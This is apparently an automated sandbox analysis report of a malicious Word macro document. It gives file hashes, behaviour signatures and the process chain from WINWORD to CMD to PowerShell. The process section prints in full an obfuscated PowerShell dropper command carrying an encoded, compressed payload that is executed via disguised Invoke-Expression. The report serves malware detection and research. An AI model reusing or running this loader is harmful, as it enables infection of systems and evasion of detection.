Analysis
-
max time kernel
131s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 02:02
Behavioral task
behavioral1
Sample
659f8fec40810f7fa45c49039d5d1e99_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
659f8fec40810f7fa45c49039d5d1e99_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
659f8fec40810f7fa45c49039d5d1e99_JaffaCakes118.doc
-
Size
69KB
-
MD5
659f8fec40810f7fa45c49039d5d1e99
-
SHA1
c0ac332e47fdca2bee3bbd53e41d79ecb2f40f6f
-
SHA256
63f9a90115978f57afc2afd56992e1a413d3a6b0b79fd1b0ae5036812cebf12e
-
SHA512
fb9bca5a71856ee1c6ef4c9bd0a492f2a2a450ed166052ec253752008b89953f55efb22b1d7c843e6657a24fc646890278bff03bbc558726c57aff7a512997db
-
SSDEEP
768:DXirRkVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o94GYterHihX51CLW:j4Rkocn1kp59gxBK85fBt+a9tjTiLI
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
CMD.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3804 3984 CMD.exe WINWORD.EXE -
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 27 3428 powershell.exe 29 3428 powershell.exe 32 3428 powershell.exe 33 3428 powershell.exe 35 3428 powershell.exe 37 3428 powershell.exe 38 3428 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3984 WINWORD.EXE 3984 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3428 powershell.exe 3428 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3428 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3984 WINWORD.EXE 3984 WINWORD.EXE 3984 WINWORD.EXE 3984 WINWORD.EXE 3984 WINWORD.EXE 3984 WINWORD.EXE 3984 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXECMD.exedescription pid process target process PID 3984 wrote to memory of 3804 3984 WINWORD.EXE CMD.exe PID 3984 wrote to memory of 3804 3984 WINWORD.EXE CMD.exe PID 3804 wrote to memory of 3428 3804 CMD.exe powershell.exe PID 3804 wrote to memory of 3428 3804 CMD.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\659f8fec40810f7fa45c49039d5d1e99_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\SYSTEM32\CMD.exeCMD c:\wINDOWs\SySteM32\cMd.eXE /c"seT oDB= ( NeW-ObjECT IO.COMPresSioN.DeFLatEStREAm( [Io.MemoRysTreAm] [cONvErt]::fROMbASE64sTRIng( 'NZDLbsIwEEV/JYtIBlHsPmipiCLxLEJCbLpg042dTBI3xnZtJyag/HsTWrYz554Z3VBtWSzBjxX7hsQFB3D4CGwlOEgXhVb7GBXO6RkhBQidgi0zfgaDE3Ui5akujzs9/wey5sJLiivJtcK2JCl1lOSgCM07GfG0fiY1N5Ul++N2YlN3DwqwTFVJAdb0Z29uoXLLHZCnxiWXbCNWhzvtvceQMW4YFzm3tKF/35iFFz96eseYMjnYsTa8M5qKrOlEm8fXZfOO8KcW3A3QHA2jkKcyiAP0Nn1BUbi/LOMQZD1zcNIj9IVG/X6EMJwBRZkyQJNiEC42NuAy6OsZXp1prmFXI14rL4Wi6QcXcGMegl44jHayViWMd530NolY5ymjNqEuKa5t+ws=' ) , [SYstEm.Io.coMpResSioN.cOMPrEsSIONmOde]::deCOMprEsS) ^| % { NeW-ObjECT sYsTEM.iO.StReaMReaDeR( $_ ,[Text.EnCoDINg]::aSCiI )} ^|%{ $_.rEadtOEnD( ) })^|^&((get-VariABlE '*MDR*').nAME[3,11,2]-join'')&& POwErSheLL Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( ^&( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti' )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN' ).Invoke( ( ${z`lAh3g}::( \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwErSheLL Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( &( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti' )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN' ).Invoke( ( ${z`lAh3g}::( \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3428
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82